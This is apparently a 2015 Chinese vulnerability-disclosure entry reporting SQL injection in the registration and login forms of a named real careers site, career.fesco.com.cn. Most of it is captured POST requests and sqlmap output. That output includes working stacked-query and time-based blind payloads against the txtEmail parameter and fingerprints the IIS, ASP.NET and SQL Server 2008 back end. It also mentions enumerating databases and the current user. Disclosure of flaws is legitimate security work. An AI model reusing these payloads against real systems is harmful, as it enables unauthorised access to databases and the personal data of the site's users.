2015-03-25: 细节已通知厂商并且等待厂商处理中 2015-03-30: 厂商已经主动忽略漏洞,细节向公众公开
都是POST注入
http://career.fesco.com.cn/registerpost.txt如何:
POST /register HTTP/1.1Host: career.fesco.com.cnUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://career.fesco.com.cn/registerCookie: lzstat_uv=62988003890204689|2631557; lzstat_ss=3083602118_1_1427296096_2631557Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 358__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTIxNDU3MjI1OTVkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQZCdG5SZWdq7Gednoo9Pgy47dsVj6rKnVrnRcQ1prlVFELq3aXpNQ%3D%3D&__VIEWSTATEGENERATOR=799CC77D&txtEmail=123%40qq.com&txtEmail%24CVS=&txtPwd=123&txtPwd%24CVS=&txtRePwd=123&txtRePwd%24CVS=&BtnReg=&DXScript=1_32%2C1_61%2C2_22%2C2_29%2C2_15&BtnReg=
txtEmail参数存在时间盲注
Place: POSTParameter: txtEmail Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTIxNDU3MjI1OTUPZBYCAgMPZBYGAgMPPCsABQEADxYCHgVWYWx1ZQUKMTIzQHFxLmNvbWRkAgcPPCsABQEADxYCHwAFAzEyM2RkAgsPPCsABQEADxYCHwAFAzEyM2RkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQZCdG5SZWeh0Oe9ObWv8nnLkqPV3sKbSENeljlu0gZjlitiEHnM6g==&__VIEWSTATEGENERATOR=799CC77D&txtEmail=123@qq.com'; WAITFOR DELAY '0:0:5'--&txtEmail$CVS=&txtPwd=123&txtPwd$CVS=&txtRePwd=123&txtRePwd$CVS=&BtnReg=&DXScript=1_32,1_61,2_22,2_29,2_15&BtnReg= Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTIxNDU3MjI1OTUPZBYCAgMPZBYGAgMPPCsABQEADxYCHgVWYWx1ZQUKMTIzQHFxLmNvbWRkAgcPPCsABQEADxYCHwAFAzEyM2RkAgsPPCsABQEADxYCHwAFAzEyM2RkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQZCdG5SZWeh0Oe9ObWv8nnLkqPV3sKbSENeljlu0gZjlitiEHnM6g==&__VIEWSTATEGENERATOR=799CC77D&txtEmail=123@qq.com' WAITFOR DELAY '0:0:5'--&txtEmail$CVS=&txtPwd=123&txtPwd$CVS=&txtRePwd=123&txtRePwd$CVS=&BtnReg=&DXScript=1_32,1_61,2_22,2_29,2_15&BtnReg=---
http://career.fesco.com.cn/loginpost.txt如下:
POST /login HTTP/1.1Host: career.fesco.com.cnUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://career.fesco.com.cn/loginCookie: lzstat_uv=62988003890204689|2631557; lzstat_ss=3083602118_1_1427296096_2631557; ASP.NET_SessionId=rvs3g4n4l4rsazuyn4alo3hnConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 347__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTcyNTQzNTgyOGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFCEJ0bkxvZ2luBQZCdG5SZWfVy4voYCNxsXJNA1%2BF4nFBOmWUIZztmbLwXvZBUSJ92g%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&txtEmail=111%40qq.com&txtEmail%24CVS=&txtPwd=111&txtPwd%24CVS=&BtnLogin=&DXScript=1_32%2C1_61%2C2_22%2C2_29%2C2_15&BtnLogin=
参数txtEmail存在时间盲注
Place: POSTParameter: txtEmail Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTcyNTQzNTgyOA9kFgICAw9kFgQCAw88KwAFAQAPFgIeBVZhbHVlBQoxMTFAcXEuY29tZGQCBw88KwAFAQAPFgIfAAUDMTExZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFCEJ0bkxvZ2luBQZCdG5SZWcicURw8hfZVrVqmEn7Wpvpg4q5tzRVv+cbykSGL1YsXg==&__VIEWSTATEGENERATOR=C2EE9ABB&txtEmail=111@qq.com'; WAITFOR DELAY '0:0:5'--&txtEmail$CVS=&txtPwd=111&txtPwd$CVS=&BtnLogin=&DXScript=1_32,1_61,2_22,2_29,2_15&BtnLogin= Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTcyNTQzNTgyOA9kFgICAw9kFgQCAw88KwAFAQAPFgIeBVZhbHVlBQoxMTFAcXEuY29tZGQCBw88KwAFAQAPFgIfAAUDMTExZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFCEJ0bkxvZ2luBQZCdG5SZWcicURw8hfZVrVqmEn7Wpvpg4q5tzRVv+cbykSGL1YsXg==&__VIEWSTATEGENERATOR=C2EE9ABB&txtEmail=111@qq.com' WAITFOR DELAY '0:0:5'--&txtEmail$CVS=&txtPwd=111&txtPwd$CVS=&BtnLogin=&DXScript=1_32,1_61,2_22,2_29,2_15&BtnLogin=---[16:01:43] [INFO] testing Microsoft SQL Server[16:01:43] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors [16:01:48] [INFO] confirming Microsoft SQL Server[16:02:04] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2008
列数据库--
当前用户--
你懂de
危害等级:无影响厂商忽略
忽略时间:2015-03-30 18:48
暂无